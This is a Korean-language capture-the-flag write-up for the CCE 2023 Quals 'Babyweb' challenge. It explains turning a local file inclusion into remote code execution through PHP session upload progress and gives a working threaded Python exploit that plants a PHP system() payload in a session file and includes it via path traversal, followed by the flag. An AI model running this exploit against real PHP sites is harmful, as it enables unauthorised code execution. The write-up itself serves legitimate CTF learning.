[CCE 2023 Quals] Babyweb (1)

Prob

---

[www]
user = www-data
group = www-data
listen = /run/php/php7.4-fpm.sock
listen.owner = www-data
listen.group = www-data
pm = dynamic
pm.max_children = 48
pm.start_servers = 16
pm.min_spare_servers = 8
pm.max_spare_servers = 16
php_admin_value[session.upload_progress.enabled] = 1
php_admin_value[memory_limit] = 32M
php_admin_value[max_execution_time] = 10s
php_admin_value[opcache.enable] = 0
request_terminate_timeout = 15s

이 문제에서 www.conf 파일을 보면 PHP_SESSION_UPLOAD_PROGRESS를 켜둔 것을 확인할 수 있었습니다.

php_admin_value[session.upload_progress.enabled] = 1

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS - HackTricks

PHP_SESSION_UPLOAD_PROGRESS 가 켜져 있는 경우 POST 데이터에 PHP_SESSION_UPLOAD_PROGRESS 매개 변수를 넣어 서버로 보내주면 세션을 강제로 생성할 수 있습니다.

세션 파일의 이름은 PHPSESSID 값으로 생성되고 아래의 경로에 생성되게 됩니다.

/var/lib/php/sessions/sess_{} 

그리고 PHP_SESSION_UPLOAD_PROGRESS 에 제공된 모든 값이 세션 파일의 내용이 됩니다. 
이를 이용해 아래의 익스 코드로 LFI to RCE를 트리거 시켜 문제를 풀 수 있었습니다.

[Web] HackCTF Wise Saying

나머진 이 문제 참고.

 

 

 

Exploit

---

import requests
import threading

url = "http://20.196.197.149:8000/"

found_flag = False

def sess_req():
    cookie = {"PHPSESSID": "hackintoanetwork"}
    data = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("/readflag")?>'}

    while not found_flag:
        res = requests.post(url, files={"f": "hackintoanetwork"}, data=data, cookies=cookie)

def exploit():
    payload = "?page=../../../../var/lib/php/sessions/sess_hackintoanetwork"
    while True:
        res = requests.get(url + payload)
        if "cce2023{" in res.text:
            print(res.text)
            global found_flag
            found_flag = True
            break

if __name__ == "__main__":
    threads = []
    for _ in range(10):
        thread = threading.Thread(target=sess_req)
        thread.start()
        threads.append(thread)

    exploit()

    for thread in threads:
        thread.join()

 

 

 

FLAG

---

FLAG : cce2023{1e6b9e3691debe669ecd5626e7797ad4}